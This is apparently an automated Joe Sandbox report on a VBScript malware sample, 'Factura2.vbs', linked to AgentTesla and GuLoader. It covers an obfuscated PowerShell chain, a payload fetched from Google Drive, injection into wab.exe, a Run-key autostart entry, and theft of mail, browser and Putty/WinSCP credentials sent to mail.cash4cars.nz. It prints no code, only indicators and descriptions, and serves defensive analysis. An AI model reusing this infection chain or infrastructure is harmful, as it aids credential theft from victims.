            Hidden Files and Directories            		/etc/passwd and /etc/shadow1
            System Network Configuration Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Rundll32            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427893 Sample: Factura2.vbs Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 38 mail.cash4cars.nz 2->38 40 ip-api.com 2->40 42 2 other IPs or domains 2->42 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus detection for URL or domain 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 6 other signatures 2->58 9 wscript.exe 1 2->9         started        12 newfile.exe 1 2->12         started        14 newfile.exe 3 1 2->14         started        16 rundll32.exe 2->16         started        signatures3 process4 signatures5 70 VBScript performs obfuscated calls to suspicious functions 9->70 72 Suspicious powershell command line found 9->72 74 Wscript starts Powershell (via cmd or directly) 9->74 76 2 other signatures 9->76 18 powershell.exe 14 19 9->18         started        process6 dnsIp7 44 drive.google.com 64.233.185.138, 443, 49700, 49710 GOOGLEUS United States 18->44 46 drive.usercontent.google.com 74.125.138.132, 443, 49701, 49711 GOOGLEUS United States 18->46 60 Suspicious powershell command line found 18->60 62 Very long command line found 18->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 18->64 22 powershell.exe 17 18->22         started        25 conhost.exe 18->25         started        27 cmd.exe 1 18->27         started        signatures8 process9 signatures10 66 Writes to foreign memory regions 22->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 22->68 29 wab.exe 16 10 22->29         started        34 cmd.exe 1 22->34         started        process11 dnsIp12 48 ip-api.com 208.95.112.1, 49712, 80 TUT-ASUS United States 29->48 50 mail.cash4cars.nz 114.142.162.17, 26, 49713 SERVERMULE-AS-APNimbus2PtyLtdAU Australia 29->50 36 C:\Users\user\AppData\Roaming\...\newfile.exe, PE32 29->36 dropped 78 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->78 80 Tries to steal Mail credentials (via file / registry access) 29->80 82 Tries to harvest and steal browser information (history, passwords, etc) 29->82 84 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->84 file13 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Factura2.vbs17%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\newfile\newfile.exe0%ReversingLabs
            C:\Users\user\AppData\Roaming\newfile\newfile.exe0%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            mail.cash4cars.nz2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://crl.microsoft0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            mail.cash4cars.nz
            		114.142.162.17
            		truefalseunknown
            drive.google.com
            		64.233.185.138
            		truefalse
              		high
              drive.usercontent.google.com
              		74.125.138.132
              		truefalse
                		high
                ip-api.com
                		208.95.112.1
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://ip-api.com/line/?fields=hostingfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.google.compowershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2774144836.00000243A9F7D000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crl.microsoftpowershell.exe, 00000005.00000002.2595421485.0000000007B4F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://go.micropowershell.exe, 00000002.00000002.2774144836.00000243A95EA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://drive.google.compowershell.exe, 00000002.00000002.2774144836.00000243A9A4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.usercontent.googhpowershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://drive.googPbpowershell.exe, 00000002.00000002.2774144836.00000243A9F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://drive.google.compowershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://apis.google.compowershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  208.95.112.1
                                                  		ip-api.comUnited States
                                                  		53334TUT-ASUSfalse
                                                  114.142.162.17
                                                  		mail.cash4cars.nzAustralia
                                                  		133525SERVERMULE-AS-APNimbus2PtyLtdAUfalse
                                                  74.125.138.132
                                                  		drive.usercontent.google.comUnited States
                                                  		15169GOOGLEUSfalse
                                                  64.233.185.138
                                                  		drive.google.comUnited States
                                                  		15169GOOGLEUSfalse

                                                  General Information

                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1427893
                                                  Start date and time:2024-04-18 10:10:08 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 8m 23s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:15
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Factura2.vbs
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winVBS@15/10@4/4
                                                  EGA Information:
                                                  • Successful, ratio: 50%
                                                  HCA Information:
                                                  • Successful, ratio: 90%
                                                  • Number of executed functions: 60
                                                  • Number of non-executed functions: 13
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .vbs

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                  • Excluded IPs from analysis (whitelisted): 72.21.81.240
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target powershell.exe, PID 5672 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 6136 because it is empty
                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  10:10:53API Interceptor1x Sleep call for process: wscript.exe modified
                                                  10:10:56API Interceptor81426x Sleep call for process: powershell.exe modified
                                                  10:11:47API Interceptor46x Sleep call for process: wab.exe modified
                                                  10:11:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                  10:11:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  208.95.112.1yDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  dgxK76VlXC.exeGet hashmaliciousAsyncRAT, StormKitty, SugarDump, VenomRAT, XWorm, XenoRATBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  114.142.162.17http://otahuhumainstreet.co.nzGet hashmaliciousUnknownBrowse
                                                  • otahuhumainstreet.co.nz/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ip-api.comyDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                  • 208.95.112.1
                                                  QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 208.95.112.1
                                                  PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                  • 208.95.112.1
                                                  mail.cash4cars.nzFACTURA2402616 - BP.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 114.142.162.17
                                                  20220829_PEDIDO_22073M_PROTECO.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                  • 114.142.162.17
                                                  wphil.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 114.142.162.17
                                                  phills.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 114.142.162.17
                                                  TRANSFERENCIA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 114.142.162.17

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  SERVERMULE-AS-APNimbus2PtyLtdAUFACTURA2402616 - BP.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 114.142.162.17
                                                  https://loia.co.nz/news/Get hashmaliciousUnknownBrowse
                                                  • 114.142.162.113
                                                  20220829_PEDIDO_22073M_PROTECO.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                  • 114.142.162.17
                                                  wphil.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 114.142.162.17
                                                  phills.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 114.142.162.17
                                                  http://otahuhumainstreet.co.nzGet hashmaliciousUnknownBrowse
                                                  • 114.142.162.17
                                                  TRANSFERENCIA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 114.142.162.17
                                                  https://url7923.marsello.io/ls/click?upn=Xn88PJeNIL29Y2OVpP6Ui77nuc8oDLgngY4uyeAXou9EXVhHDo7M7WHe3tN4zKrNqxWWEA5i4ALTH8pKKbUBr8kl-2BaKOzRLYF4O9jWbQC4ETh3gaxy9Zl1P3us3e17tJsOUlwKwJzxH4U-2B4YCtdCKhwUoMCpyg7NNUrzuTgIzLhQxGftKThIbPuB8Nb-2BmtgGKsOqoXJ6U-2BADfghQ4BcLNnTCz8WOPd-2BpwYHQG27-2BmJL39Wz4GTGCtL1hCPh2SqRMSXI8OwZccm8GVU0Gku6MXMfJSjn1THezTD7Flfnhq9iTsL-2BqgwPTJls8-2BjTRc9BY-2Fh46AKx7Gq-2BWbs5Lh-2FWQDqHD79-2B4wi1xXGfVC-2BI5uRu3qb5Q9qE91C7McXL75baWeYwaEUD7jYVNTTkRP-2FiKAc2nAmKMZsvHdn9PKT9NJ5TiHTmuV8UPHx0hFbT-2FoZA30Gyvk1bp9nD9i4ph-2FoNGhnG8uLjEFPWprwatRp-2BQP6kJLn0uBau00h5QqYuOD7Gd92H3pJEI2BfGxRuVIYX14IBzVhmt-2FctDQIodsoatwLgBTnXhKygRejP8skmeldJI5rHqpFfHhWIg1giPRBfTcEg150YV1v9ETyT6Uifk9s6pHCUdZuw8FUIg-2FSbNwIPCsOE0tsI92UTXCdYi6N-2BNoVyL5OSJbyKJgkTtz2jqi7AlzjDgir0my-2FxeWtqBHHYkMxYllC-2FmTPEy-2FqqCLzFEBLlb8e7rfV0bdk6NMZJP-2BDoaOQFrsJCqLrTH-2FHiFfjxsqFhZdUVupOzthlEpPfONW-2B2H8nekGdMTeaCngXu3zWc9dllqrzWlyGYp5lI7idB-2Fns-2BSeSTLsYROOiQFyQnqs5rmrBtcUWvjJHXJ3dmnj8KOfXx7z7cF1nFFIoLyyC4A2WszgjnyvArLXGAkLuDptrq7S-2F88fXEocvf6m6FOIX5hxP5J-2FvC2AO5vvCZZGy9uq34DhBKapR-2B7Vxz1tPfsMZilBPcewHkG4U49WMe8dMwUgJvvBkUx7yWefFJGBtWEORYw_2Y2nVgmUakfOiBzkPBl9g-2FvXw-2FFdue1unOqOSl8Xbnm8oyn4sQ-2F2R3PuNTB7lzli8dA6wSmZNwvXv0UBP70uz2P7zFeqUQegpRcaNeCb4-2BWo5EMrZl28tbwQuhDxCamhvmJQ78wNqNkJLChbQ5ciL5dF8RTLCXk67iO0rqc-2B997j0jfrQKNGv90V9PpeyTMKMz6uyPn3kl5bKhRkgMa89T2u1Ha6YWBhcLFnbd7qfYUd0oAl-2FInhvnCyq9jNwdAsFJFgoaHWAB8L64Z2VCGpLFl8sksVrNSWRj-2BTF3SRr64edhOQkh-2BO3y489msvprf-2F&utm_source=tinas-newsletter-1eb35b.beehiiv.com&utm_medium=newsletter&utm_campaign=new-postGet hashmaliciousUnknownBrowse
                                                  • 114.142.162.65
                                                  https://r20.rs6.net/tn.jsp?f=001U66jxouxDpcCsmHjJXG8d7KqPNZ55zh32bLc0C3cqHFmMI6VgvlDVFCZtVmckIpGvZ5W1UicaYKH3h7Sc5p1gpFJsVHUNrlWmnnZcDVIFDY2JyVJHYKv5ZTaDnWV_0ErkJ_Bbrk-kSY=&c=&ch=/&__=/b6aa/GDGnz/dmFuZGl0YS5zYW1hdmVkaUBvdmVybGFrZWhvc3BpdGFsLm9yZw==Get hashmaliciousHTMLPhisherBrowse
                                                  • 114.142.162.97
                                                  e5ec904f-4817-d75a-afb8-0811d36c8183.emlGet hashmaliciousUnknownBrowse
                                                  • 114.142.162.17
                                                  TUT-ASUSyDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                  • 208.95.112.1
                                                  QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 208.95.112.1
                                                  PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.95.112.1
                                                  PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                  • 208.95.112.1

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  3b5074b1b5d032e5620f69f9f700ff0ePurchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exeGet hashmaliciousUnknownBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  SecuriteInfo.com.Heur.15333.25205.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exeGet hashmaliciousUnknownBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  SecuriteInfo.com.Win32.MalwareX-gen.3610.30636.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  37f463bf4616ecd445d4a1937da06e19u2.batGet hashmaliciousBazar Loader, QbotBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  file.exeGet hashmaliciousVidarBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  FACTURA2402616 - BP.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  #U03a3#U03a5#U039c#U0392#U039f#U039b#U0391#U0399#U039f DEV8759-pdf.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  #U03a3#U03a5#U039c#U0392#U039f#U039b#U0391#U0399#U039f DEV8759-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  file.exeGet hashmaliciousVidarBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  S#U00d6ZLE#U015eME DEV8759 - pdf.exeGet hashmaliciousGuLoaderBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  CONTRACTUL DEV8759-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138
                                                  1704202412475.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 74.125.138.132
                                                  • 64.233.185.138

                                                  Dropped Files

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Users\user\AppData\Roaming\newfile\newfile.exeAPR 20204 RFQ .xlsx.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    RFQ_2414976#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                      QUOTE AL ZARQA MILITARY HOSPITAL#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                        FACT AZUR TJ .pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          FACT AZUR TJ .pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            FACT AZUR TJ .pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              RFQ_.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                58826828#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                  2024-APR salary payroll confirm .pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                    UNLP-9004898-Oferta#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                      Download File
                                                                      Process:C:\Windows\System32\wscript.exe
                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                      Category:dropped
                                                                      Size (bytes):69993
                                                                      Entropy (8bit):7.99584879649948
                                                                      Encrypted:true
                                                                      SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                                      MD5:29F65BA8E88C063813CC50A4EA544E93
                                                                      SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                                      SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                                      SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                      Download File
                                                                      Process:C:\Windows\System32\wscript.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):330
                                                                      Entropy (8bit):3.1475546137593846
                                                                      Encrypted:false
                                                                      SSDEEP:6:kKZ+slllDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:DllMkPlE99SNxAhUeVLVt
                                                                      MD5:E7223244A0990B7F57AE1E7FB56F5148
                                                                      SHA1:105DB4D243B5424857784FCF2FA6DD395B017B68
                                                                      SHA-256:668400C568216B8AD3AE9318031885DDB40C12E1A7C5A6E6D15AA63F1975059E
                                                                      SHA-512:A9D01CE5ADF01508CD23728D50477012DDA6424574B68A5FBD9C7AB8A149176485CEBCAFCFF1A939A6ED4588BB549BFE6BB4B9944A7DD00500D177F3AF8ECFBB
                                                                      Malicious:false
                                                                      Preview:p...... ............g...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

